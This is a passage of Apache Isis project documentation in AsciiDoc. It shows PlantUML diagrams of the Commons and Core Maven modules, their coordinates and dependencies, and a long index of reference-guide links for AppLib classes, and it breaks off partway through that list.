100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Commons\\n[Software System]\" {\n rectangle \"==Apache Isis Commons\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Commons)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Commons\n[source,yaml]\n----\nGroup: org.apache.isis.commons\nArtifact: isis-commons\nType: jar\nDirectory: \/commons\n----\n|Apache Isis Commons is a library with utilities, that are shared with the entire Apache Isis ecosystem.\n\n.Dependencies\n****\ncom.fasterxml.jackson.core:jackson-databind:jar:<managed> +\ncom.google.code.findbugs:annotations:jar:<managed> +\njavax:javaee-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.jupiter:junit-jupiter-params:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\norg.slf4j:slf4j-api:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\norg.springframework:spring-tx:jar:<managed> +\norg.springframework.boot:spring-boot-starter:jar:<managed> +\norg.springframework.boot:spring-boot-starter-log4j2:jar:<managed> +\norg.yaml:snakeyaml:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:commons:index\/collections\/Can.adoc[Can], xref:refguide:commons:index\/collections\/Cardinality.adoc[Cardinality], xref:refguide:commons:index\/functional\/Result.adoc[Result], xref:refguide:commons:index\/resource\/ResourceCoordinates.adoc[ResourceCoordinates]\n****\n|===\n\n== Core\n\n[plantuml,Core,svg]\n----\n@startuml(id=Core)\ntitle Core - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<13>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<14>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<15>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core\\n[Software System]\" {\n rectangle \"==Apache Isis - JDK Supplemental\\n<size:10>[Container: packaging: pom]<\/size>\" <<14>> as 14\n rectangle \"==Apache Isis Core\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Core - AppLib\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Core - Code Gen (ByteBuddy)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Core - Configuration\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Core - Interaction\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Core - MetaModel\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Core - Runtime\\n<size:10>[Container: packaging: jar]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Core - Runtime Services\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Core - Schemas\\n<size:10>[Container: packaging: jar]<\/size>\" <<15>> as 15\n rectangle \"==Apache Isis Core - Security\\n<size:10>[Container: packaging: jar]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Core - Transaction\\n<size:10>[Container: packaging: jar]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Core - Unit Test Support\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Core - WebApp\\n<size:10>[Container: packaging: jar]<\/size>\" <<13>> as 13\n}\n2 .[#707070].> 14 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 8 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 10 : \"\"\n2 .[#707070].> 15 : \"\"\n2 .[#707070].> 11 : \"\"\n2 .[#707070].> 12 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 13 : \"\"\n@enduml\n----\n.Projects\/Modules (Core)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Core\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core\nType: pom\nDirectory: \/core\n----\n|Core framework, providing metamodel, runtime and core APIs.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Core - AppLib\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-applib\nType: jar\nDirectory: \/api\/applib\n----\n|Isis application library, defining annotations and utilities for the\ndefault (Java) programming model.\n\n.Components\n****\no.a.i.applib.annotation.DomainObject +\no.a.i.applib.annotation.DomainService +\no.a.i.applib.services.commanddto.conmap.ContentMappingServiceForCommandDto +\no.a.i.applib.services.commanddto.conmap.ContentMappingServiceForCommandsDto +\no.a.i.applib.services.commanddto.processor.spi.CommandDtoProcessorServiceIdentity +\no.a.i.applib.services.publishing.log.CommandLogger +\no.a.i.applib.services.publishing.log.EntityChangesLogger +\no.a.i.applib.services.publishing.log.EntityPropertyChangeLogger +\no.a.i.applib.services.publishing.log.ExecutionLogger +\no.a.i.applib.services.session.SessionLoggingServiceLogging +\n****\n\n.Dependencies\n****\ncom.google.code.findbugs:annotations:jar:<managed> +\njavax:javaee-api:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.assertj:assertj-core:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:applib:index\/AbstractViewModel.adoc[AbstractViewModel], xref:refguide:applib:index\/Identifier.adoc[Identifier], xref:refguide:applib:index\/IsisModuleApplib.adoc[IsisModuleApplib], xref:refguide:applib:index\/RecreatableDomainObject.adoc[RecreatableDomainObject], xref:refguide:applib:index\/ViewModel.adoc[ViewModel], xref:refguide:applib:index\/adapters\/AbstractValueSemanticsProvider.adoc[AbstractValueSemanticsProvider], xref:refguide:applib:index\/adapters\/DefaultsProvider.adoc[DefaultsProvider], xref:refguide:applib:index\/adapters\/EncoderDecoder.adoc[EncoderDecoder], xref:refguide:applib:index\/adapters\/EncodingException.adoc[EncodingException], xref:refguide:applib:index\/adapters\/Parser.adoc[Parser], xref:refguide:applib:index\/adapters\/ParsingException.adoc[ParsingException], xref:refguide:applib:index\/adapters\/ValueSemanticsProvider.adoc[ValueSemanticsProvider], xref:refguide:applib:index\/annotation\/Action.adoc[Action], xref:refguide:applib:index\/annotation\/ActionLayout.adoc[ActionLayout], xref:refguide:applib:index\/annotation\/BookmarkPolicy.adoc[BookmarkPolicy], xref:refguide:applib:index\/annotation\/Bounding.adoc[Bounding], xref:refguide:applib:index\/annotation\/Collection.adoc[Collection], xref:refguide:applib:index\/annotation\/CollectionLayout.adoc[CollectionLayout], xref:refguide:applib:index\/annotation\/Defaulted.adoc[Defaulted], xref:refguide:applib:index\/annotation\/DomainObject.adoc[DomainObject], xref:refguide:applib:index\/annotation\/DomainObjectLayout.adoc[DomainObjectLayout], xref:refguide:applib:index\/annotation\/DomainService.adoc[DomainService], xref:refguide:applib:index\/annotation\/DomainServiceLayout.adoc[DomainServiceLayout], xref:refguide:applib:index\/annotation\/DomainServiceLayout~MenuBar.adoc[DomainServiceLayout.MenuBar], xref:refguide:applib:index\/annotation\/Editing.adoc[Editing], xref:refguide:applib:index\/annotation\/EntityChangeKind.adoc[EntityChangeKind], xref:refguide:applib:index\/annotation\/EqualByContent.adoc[EqualByContent], xref:refguide:applib:index\/annotation\/Facets.adoc[Facets], xref:refguide:applib:index\/annotation\/HomePage.adoc[HomePage], xref:refguide:applib:index\/annotation\/InteractionScope.adoc[InteractionScope], xref:refguide:applib:index\/annotation\/LabelPosition.adoc[LabelPosition], xref:refguide:applib:index\/annotation\/MemberOrder.adoc[MemberOrder], xref:refguide:applib:index\/annotation\/MinLength.adoc[MinLength], xref:refguide:applib:index\/annotation\/Module.adoc[Module], xref:refguide:applib:index\/annotation\/Nature.adoc[Nature], xref:refguide:applib:index\/annotation\/NatureOfService.adoc[NatureOfService], xref:refguide:applib:index\/annotation\/Navigable.adoc[Navigable], xref:refguide:applib:index\/annotation\/Optionality.adoc[Optionality], xref:refguide:applib:index\/annotation\/OrderPrecedence.adoc[OrderPrecedence], xref:refguide:applib:index\/annotation\/Parameter.adoc[Parameter], xref:refguide:applib:index\/annotation\/ParameterLayout.adoc[ParameterLayout], xref:refguide:applib:index\/annotation\/Programmatic.adoc[Programmatic], xref:refguide:applib:index\/annotation\/Projecting.adoc[Projecting], xref:refguide:applib:index\/annotation\/PromptStyle.adoc[PromptStyle], xref:refguide:applib:index\/annotation\/Property.adoc[Property], xref:refguide:applib:index\/annotation\/PropertyLayout.adoc[PropertyLayout], xref:refguide:applib:index\/annotation\/Publishing.adoc[Publishing], xref:refguide:applib:index\/annotation\/Redirect.adoc[Redirect], xref:refguide:applib:index\/annotation\/RenderDay.adoc[RenderDay], xref:refguide:applib:index\/annotation\/Repainting.adoc[Repainting], xref:refguide:applib:index\/annotation\/RestrictTo.adoc[RestrictTo], xref:refguide:applib:index\/annotation\/SemanticsOf.adoc[SemanticsOf], xref:refguide:applib:index\/annotation\/Snapshot.adoc[Snapshot], xref:refguide:applib:index\/annotation\/Title.adoc[Title], xref:refguide:applib:index\/annotation\/Value.adoc[Value], xref:refguide:applib:index\/annotation\/Where.adoc[Where], xref:refguide:applib:index\/client\/RepresentationTypeSimplifiedV2.adoc[RepresentationTypeSimplifiedV2], xref:refguide:applib:index\/client\/SuppressionType.adoc[SuppressionType], xref:refguide:applib:index\/clock\/VirtualClock.adoc[VirtualClock], xref:refguide:applib:index\/domain\/DomainObjectList.adoc[DomainObjectList], xref:refguide:applib:index\/events\/EventObjectBase.adoc[EventObjectBase], xref:refguide:applib:index\/events\/domain\/AbstractDomainEvent.adoc[AbstractDomainEvent], xref:refguide:applib:index\/events\/domain\/ActionDomainEvent.adoc[ActionDomainEvent], xref:refguide:applib:index\/events\/domain\/CollectionDomainEvent.adoc[CollectionDomainEvent], xref:refguide:applib:index\/events\/domain\/PropertyDomainEvent.adoc[PropertyDomainEvent], xref:refguide:applib:index\/events\/lifecycle\/AbstractLifecycleEvent.adoc[AbstractLifecycleEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectCreatedEvent.adoc[ObjectCreatedEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectLoadedEvent.adoc[ObjectLoadedEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectPersistedEvent.adoc[ObjectPersistedEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectPersistingEvent.adoc[ObjectPersistingEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectRemovingEvent.adoc[ObjectRemovingEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectUpdatedEvent.adoc[ObjectUpdatedEvent], xref:refguide:applib:index\/events\/lifecycle\/ObjectUpdatingEvent.adoc[ObjectUpdatingEvent], xref:refguide:applib:index\/events\/ui\/AbstractUiEvent.adoc[AbstractUiEvent], xref:refguide:applib:index\/events\/ui\/CssClassUiEvent.adoc[CssClassUiEvent], xref:refguide:applib:index\/events\/ui\/IconUiEvent.adoc[IconUiEvent], xref:refguide:applib:index\/events\/ui\/LayoutUiEvent.adoc[LayoutUiEvent], xref:refguide:applib:index\/events\/ui\/TitleUiEvent.adoc[TitleUiEvent], xref:refguide:applib:index\/exceptions\/RecoverableException.adoc[RecoverableException], xref:refguide:applib:index\/exceptions\/TranslatableException.adoc[TranslatableException], xref:refguide:applib:index\/exceptions\/UnrecoverableException.adoc[UnrecoverableException], xref:refguide:applib:index\/exceptions\/unrecoverable\/DomainModelException.adoc[DomainModelException], xref:refguide:applib:index\/exceptions\/unrecoverable\/MetaModelException.adoc[MetaModelException], xref:refguide:applib:index\/exceptions\/unrecoverable\/NoAuthenticatorException.adoc[NoAuthenticatorException], xref:refguide:applib:index\/exceptions\/unrecoverable\/ObjectNotFoundException.adoc[ObjectNotFoundException], xref:refguide:applib:index\/exceptions\/unrecoverable\/ObjectPersistenceException.adoc[ObjectPersistenceException], xref:refguide:applib:index\/exceptions\/unrecoverable\/PersistFailedException.adoc[PersistFailedException], xref:refguide:applib:index\/exceptions\/unrecoverable\/ReflectiveActionException.adoc[ReflectiveActionException], xref:refguide:applib:index\/exceptions\/unrecoverable\/RepositoryException.adoc[RepositoryException], xref:refguide:applib:index\/exceptions\/unrecoverable\/UnexpectedCallException.adoc[UnexpectedCallException], xref:refguide:applib:index\/exceptions\/unrecoverable\/UnknownTypeException.adoc[UnknownTypeException], xref:refguide:applib:index\/graph\/Edge.adoc[Edge], xref:refguide:applib:index\/graph\/SimpleEdge.adoc[SimpleEdge], xref:refguide:applib:index\/graph\/Vertex.adoc[Vertex], xref:refguide:applib:index\/graph\/tree\/LazyTreeNode.adoc[LazyTreeNode], xref:refguide:applib:index\/graph\/tree\/TreeAdapter.adoc[TreeAdapter], xref:refguide:applib:index\/graph\/tree\/TreeNode.adoc[TreeNode], xref:refguide:applib:index\/graph\/tree\/TreePath.adoc[TreePath], xref:refguide:applib:index\/graph\/tree\/TreeState.adoc[TreeState], xref:refguide:applib:index\/id\/HasLogicalType.adoc[HasLogicalType], xref:refguide:applib:index\/id\/LogicalType.adoc[LogicalType], xref:refguide:applib:index\/jaxb\/DataTypeFactory.adoc[DataTypeFactory], xref:refguide:applib:index\/jaxb\/JavaSqlJaxbAdapters.adoc[JavaSqlJaxbAdapters], xref:refguide:applib:index\/jaxb\/JavaSqlXMLGregorianCalendarMarshalling.adoc[JavaSqlXMLGregorianCalendarMarshalling], xref:refguide:applib:index\/jaxb\/JavaTimeJaxbAdapters.adoc[JavaTimeJaxbAdapters], xref:refguide:applib:index\/jaxb\/JavaTimeXMLGregorianCalendarMarshalling.adoc[JavaTimeXMLGregorianCalendarMarshalling], xref:refguide:applib:index\/jaxb\/JavaUtilJaxbAdapters.adoc[JavaUtilJaxbAdapters], xref:refguide:applib:index\/jaxb\/JodaTimeJaxbAdapters.adoc[JodaTimeJaxbAdapters], xref:refguide:applib:index\/jaxb\/JodaTimeXMLGregorianCalendarMarshalling.adoc[JodaTimeXMLGregorianCalendarMarshalling], xref:refguide:applib:index\/jaxb\/PersistentEntitiesAdapter.adoc[PersistentEntitiesAdapter], xref:refguide:applib:index\/jaxb\/PersistentEntityAdapter.adoc[PersistentEntityAdapter], xref:refguide:applib:index\/jaxb\/PrimitiveJaxbAdapters.adoc[PrimitiveJaxbAdapters], xref:refguide:applib:index\/layout\/component\/ActionLayoutData.adoc[ActionLayoutData], xref:refguide:applib:index\/layout\/component\/ActionLayoutDataOwner.adoc[ActionLayoutDataOwner], xref:refguide:applib:index\/layout\/component\/CollectionLayoutData.adoc[CollectionLayoutData], xref:refguide:applib:index\/layout\/component\/CollectionLayoutDataOwner.adoc[CollectionLayoutDataOwner], xref:refguide:applib:index\/layout\/component\/CssClassFaPosition.adoc[CssClassFaPosition], xref:refguide:applib:index\/layout\/component\/DomainObjectLayoutData.adoc[DomainObjectLayoutData], xref:refguide:applib:index\/layout\/component\/DomainObjectLayoutDataOwner.adoc[DomainObjectLayoutDataOwner], xref:refguide:applib:index\/layout\/component\/FieldSet.adoc[FieldSet], xref:refguide:applib:index\/layout\/component\/FieldSetOwner.adoc[FieldSetOwner], xref:refguide:applib:index\/layout\/component\/HasBookmarking.adoc[HasBookmarking], xref:refguide:applib:index\/layout\/component\/HasCssClass.adoc[HasCssClass], xref:refguide:applib:index\/layout\/component\/HasCssClassFa.adoc[HasCssClassFa], xref:refguide:applib:index\/layout\/component\/HasDescribedAs.adoc[HasDescribedAs], xref:refguide:applib:index\/layout\/component\/HasHidden.adoc[HasHidden], xref:refguide:applib:index\/layout\/component\/HasNamed.adoc[HasNamed], xref:refguide:applib:index\/layout\/component\/MemberRegion.adoc[MemberRegion], xref:refguide:applib:index\/layout\/component\/MemberRegionOwner.adoc[MemberRegionOwner], xref:refguide:applib:index\/layout\/component\/Owned.adoc[Owned], xref:refguide:applib:index\/layout\/component\/Owner.adoc[Owner], xref:refguide:applib:index\/layout\/component\/PropertyLayoutData.adoc[PropertyLayoutData], xref:refguide:applib:index\/layout\/component\/ServiceActionLayoutData.adoc[ServiceActionLayoutData], xref:refguide:applib:index\/layout\/component\/ServiceActionLayoutDataOwner.adoc[ServiceActionLayoutDataOwner], xref:refguide:applib:index\/layout\/grid\/Grid.adoc[Grid], xref:refguide:applib:index\/layout\/grid\/GridAbstract.adoc[GridAbstract], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3ClearFix.adoc[BS3ClearFix], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3ClearFixHidden.adoc[BS3ClearFixHidden], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3ClearFixVisible.adoc[BS3ClearFixVisible], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Col.adoc[BS3Col], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Element.adoc[BS3Element], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3ElementAbstract.adoc[BS3ElementAbstract], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Grid.adoc[BS3Grid], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Row.adoc[BS3Row], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3RowContent.adoc[BS3RowContent], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3RowContentOwner.adoc[BS3RowContentOwner], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3RowOwner.adoc[BS3RowOwner], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3Tab.adoc[BS3Tab], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3TabGroup.adoc[BS3TabGroup], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3TabGroupOwner.adoc[BS3TabGroupOwner], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/BS3TabOwner.adoc[BS3TabOwner], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/HasCssId.adoc[HasCssId], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/Size.adoc[Size], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/SizeSpan.adoc[SizeSpan], xref:refguide:applib:index\/layout\/grid\/bootstrap3\/WithinGrid.adoc[WithinGrid], xref:refguide:applib:index\/layout\/links\/Link.adoc[Link], xref:refguide:applib:index\/layout\/menubars\/HasNamed.adoc[HasNamed], xref:refguide:applib:index\/layout\/menubars\/Menu.adoc[Menu], xref:refguide:applib:index\/layout\/menubars\/MenuBar.adoc[MenuBar], xref:refguide:applib:index\/layout\/menubars\/MenuBars.adoc[MenuBars], xref:refguide:applib:index\/layout\/menubars\/MenuBarsAbstract.adoc[MenuBarsAbstract], xref:refguide:applib:index\/layout\/menubars\/MenuSection.adoc[MenuSection], xref:refguide:applib:index\/layout\/menubars\/bootstrap3\/BS3Menu.adoc[BS3Menu], xref:refguide:applib:index\/layout\/menubars\/bootstrap3\/BS3MenuBar.adoc[BS3MenuBar], xref:refguide:applib:index\/layout\/menubars\/bootstrap3\/BS3MenuBars.adoc[BS3MenuBars], xref:refguide:applib:index\/layout\/menubars\/bootstrap3\/BS3MenuSection.adoc[BS3MenuSection], xref:refguide:applib:index\/mixins\/dto\/Dto.adoc[Dto], xref:refguide:applib:index\/mixins\/dto\/DtoMixinConstants.adoc[DtoMixinConstants], xref:refguide:applib:index\/mixins\/dto\/Dto_downloadXml.adoc[Dto_downloadXml], xref:refguide:applib:index\/mixins\/dto\/Dto_downloadXsd.adoc[Dto_downloadXsd], xref:refguide:applib:index\/mixins\/layout\/LayoutMixinConstants.adoc[LayoutMixinConstants], xref:refguide:applib:index\/mixins\/layout\/Object_downloadLayoutXml.adoc[Object_downloadLayoutXml], xref:refguide:applib:index\/mixins\/metamodel\/Object_downloadMetamodelXml.adoc[Object_downloadMetamodelXml], xref:refguide:applib:index\/mixins\/metamodel\/Object_objectIdentifier.adoc[Object_objectIdentifier], xref:refguide:applib:index\/mixins\/metamodel\/Object_objectType.adoc[Object_objectType], xref:refguide:applib:index\/mixins\/metamodel\/Object_rebuildMetamodel.adoc[Object_rebuildMetamodel], xref:refguide:applib:index\/mixins\/rest\/Object_openRestApi.adoc[Object_openRestApi], xref:refguide:applib:index\/mixins\/security\/HasUsername.adoc[HasUsername], xref:refguide:applib:index\/mixins\/system\/DomainChangeRecord.adoc[DomainChangeRecord], xref:refguide:applib:index\/mixins\/system\/DomainChangeRecord_openTargetObject.adoc[DomainChangeRecord_openTargetObject], xref:refguide:applib:index\/mixins\/system\/DomainChangeRecord~ChangeType.adoc[DomainChangeRecord.ChangeType], xref:refguide:applib:index\/mixins\/system\/HasInteractionId.adoc[HasInteractionId], xref:refguide:applib:index\/mixins\/system\/HasTransactionId.adoc[HasTransactionId], xref:refguide:applib:index\/mixins\/updates\/OnUpdatedAt.adoc[OnUpdatedAt], xref:refguide:applib:index\/mixins\/updates\/OnUpdatedBy.adoc[OnUpdatedBy], xref:refguide:applib:index\/mixins\/updates\/OnUpdatedByAndAt.adoc[OnUpdatedByAndAt], xref:refguide:applib:index\/query\/AllInstancesQuery.adoc[AllInstancesQuery], xref:refguide:applib:index\/query\/NamedQuery.adoc[NamedQuery], xref:refguide:applib:index\/query\/Query.adoc[Query], xref:refguide:applib:index\/query\/QueryRange.adoc[QueryRange], xref:refguide:applib:index\/services\/acceptheader\/AcceptHeaderService.adoc[AcceptHeaderService], xref:refguide:applib:index\/services\/appfeat\/ApplicationFeature.adoc[ApplicationFeature], xref:refguide:applib:index\/services\/appfeat\/ApplicationFeatureId.adoc[ApplicationFeatureId], xref:refguide:applib:index\/services\/appfeat\/ApplicationFeatureRepository.adoc[ApplicationFeatureRepository], xref:refguide:applib:index\/services\/appfeat\/ApplicationFeatureSort.adoc[ApplicationFeatureSort], xref:refguide:applib:index\/services\/appfeat\/ApplicationMemberSort.adoc[ApplicationMemberSort], xref:refguide:applib:index\/services\/bookmark\/Bookmark.adoc[Bookmark], xref:refguide:applib:index\/services\/bookmark\/BookmarkHolder.adoc[BookmarkHolder], xref:refguide:applib:index\/services\/bookmark\/BookmarkHolder_lookup.adoc[BookmarkHolder_lookup], xref:refguide:applib:index\/services\/bookmark\/BookmarkHolder_object.adoc[BookmarkHolder_object], xref:refguide:applib:index\/services\/bookmark\/BookmarkService.adoc[BookmarkService], xref:refguide:applib:index\/services\/bookmarkui\/BookmarkUiService.adoc[BookmarkUiService], xref:refguide:applib:index\/services\/clock\/ClockService.adoc[ClockService], xref:refguide:applib:index\/services\/command\/Command.adoc[Command], xref:refguide:applib:index\/services\/command\/CommandExecutorService.adoc[CommandExecutorService], xref:refguide:applib:index\/services\/command\/CommandOutcomeHandler.adoc[CommandOutcomeHandler], xref:refguide:applib:index\/services\/commanddto\/HasCommandDto.adoc[HasCommandDto], xref:refguide:applib:index\/services\/commanddto\/conmap\/ContentMappingServiceForCommandDto.adoc[ContentMappingServiceForCommandDto], xref:refguide:applib:index\/services\/commanddto\/conmap\/ContentMappingServiceForCommandsDto.adoc[ContentMappingServiceForCommandsDto], xref:refguide:applib:index\/services\/commanddto\/conmap\/UserDataKeys.adoc[UserDataKeys], xref:refguide:applib:index\/services\/commanddto\/processor\/CommandDtoProcessor.adoc[CommandDtoProcessor], xref:refguide:applib:index\/services\/commanddto\/processor\/CommandDtoProcessorForActionAbstract.adoc[CommandDtoProcessorForActionAbstract], xref:refguide:applib:index\/services\/commanddto\/processor\/CommandDtoProcessorForPropertyAbstract.adoc[CommandDtoProcessorForPropertyAbstract], xref:refguide:applib:index\/services\/commanddto\/processor\/spi\/CommandDtoProcessorService.adoc[CommandDtoProcessorService], xref:refguide:applib:index\/services\/commanddto\/processor\/spi\/CommandDtoProcessorServiceIdentity.adoc[CommandDtoProcessorServiceIdentity], xref:refguide:applib:index\/services\/confview\/ConfigurationMenu.adoc[ConfigurationMenu], xref:refguide:applib:index\/services\/confview\/ConfigurationProperty.adoc[ConfigurationProperty], xref:refguide:applib:index\/services\/confview\/ConfigurationViewService.adoc[ConfigurationViewService], xref:refguide:applib:index\/services\/conmap\/ContentMappingService.adoc[ContentMappingService], xref:refguide:applib:index\/services\/email\/EmailService.adoc[EmailService], xref:refguide:applib:index\/services\/error\/ErrorDetails.adoc[ErrorDetails], xref:refguide:applib:index\/services\/error\/ErrorReportingService.adoc[ErrorReportingService], xref:refguide:applib:index\/services\/error\/SimpleTicket.adoc[SimpleTicket], xref:refguide:applib:index\/services\/error\/Ticket.adoc[Ticket], xref:refguide:applib:index\/services\/eventbus\/EventBusService.adoc[EventBusService], xref:refguide:applib:index\/services\/exceprecog\/Category.adoc[Category], xref:refguide:applib:index\/services\/exceprecog\/ExceptionRecognizer.adoc[ExceptionRecognizer], xref:refguide:applib:index\/services\/exceprecog\/ExceptionRecognizerAbstract.adoc[ExceptionRecognizerAbstract], xref:refguide:applib:index\/services\/exceprecog\/ExceptionRecognizerForType.adoc[ExceptionRecognizerForType], xref:refguide:applib:index\/services\/exceprecog\/ExceptionRecognizerService.adoc[ExceptionRecognizerService], xref:refguide:applib:index\/services\/exceprecog\/Recognition.adoc[Recognition], xref:refguide:applib:index\/services\/factory\/FactoryService.adoc[FactoryService], xref:refguide:applib:index\/services\/grid\/GridLoaderService.adoc[GridLoaderService], xref:refguide:applib:index\/services\/grid\/GridService.adoc[GridService], xref:refguide:applib:index\/services\/grid\/GridSystemService.adoc[GridSystemService], xref:refguide:applib:index\/services\/health\/Health.adoc[Health], xref:refguide:applib:index\/services\/health\/HealthCheckService.adoc[HealthCheckService], xref:refguide:applib:index\/services\/hint\/HintIdProvider.adoc[HintIdProvider], xref:refguide:applib:index\/services\/hint\/HintStore.adoc[HintStore], xref:refguide:applib:index\/services\/homepage\/HomePageResolverService.adoc[HomePageResolverService], xref:refguide:applib:index\/services\/i18n\/LocaleProvider.adoc[LocaleProvider], xref:refguide:applib:index\/services\/i18n\/Mode.adoc[Mode], xref:refguide:applib:index\/services\/i18n\/TranslatableString.adoc[TranslatableString], xref:refguide:applib:index\/services\/i18n\/TranslationService.adoc[TranslationService], xref:refguide:applib:index\/services\/i18n\/TranslationsResolver.adoc[TranslationsResolver], xref:refguide:applib:index\/services\/iactn\/ActionInvocation.adoc[ActionInvocation], xref:refguide:applib:index\/services\/iactn\/Execution.adoc[Execution], xref:refguide:applib:index\/services\/iactn\/ExecutionContext.adoc[ExecutionContext], xref:refguide:applib:index\/services\/iactn\/Interaction.adoc[Interaction], xref:refguide:applib:index\/services\/iactn\/InteractionContext.adoc[InteractionContext], xref:refguide:applib:index\/services\/iactn\/PropertyEdit.adoc[PropertyEdit], xref:refguide:applib:index\/services\/iactn\/SequenceType.adoc[SequenceType], xref:refguide:applib:index\/services\/inject\/ServiceInjector.adoc[ServiceInjector], xref:refguide:applib:index\/services\/jaxb\/JaxbService.adoc[JaxbService], xref:refguide:applib:index\/services\/layout\/LayoutService.adoc[LayoutService], xref:refguide:applib:index\/services\/layout\/LayoutServiceMenu.adoc[LayoutServiceMenu], xref:refguide:applib:index\/services\/layout\/Style.adoc[Style], xref:refguide:applib:index\/services\/linking\/DeepLinkService.adoc[DeepLinkService], xref:refguide:applib:index\/services\/menu\/MenuBarsLoaderService.adoc[MenuBarsLoaderService], xref:refguide:applib:index\/services\/menu\/MenuBarsService.adoc[MenuBarsService], xref:refguide:applib:index\/services\/message\/MessageService.adoc[MessageService], xref:refguide:applib:index\/services\/metamodel\/BeanSort.adoc[BeanSort], xref:refguide:applib:index\/services\/metamodel\/Config.adoc[Config], xref:refguide:applib:index\/services\/metamodel\/DomainMember.adoc[DomainMember], xref:refguide:applib:index\/services\/metamodel\/DomainModel.adoc[DomainModel], xref:refguide:applib:index\/services\/metamodel\/MetaModelService.adoc[MetaModelService], xref:refguide:applib:index\/services\/metamodel\/MetaModelServiceMenu.adoc[MetaModelServiceMenu], 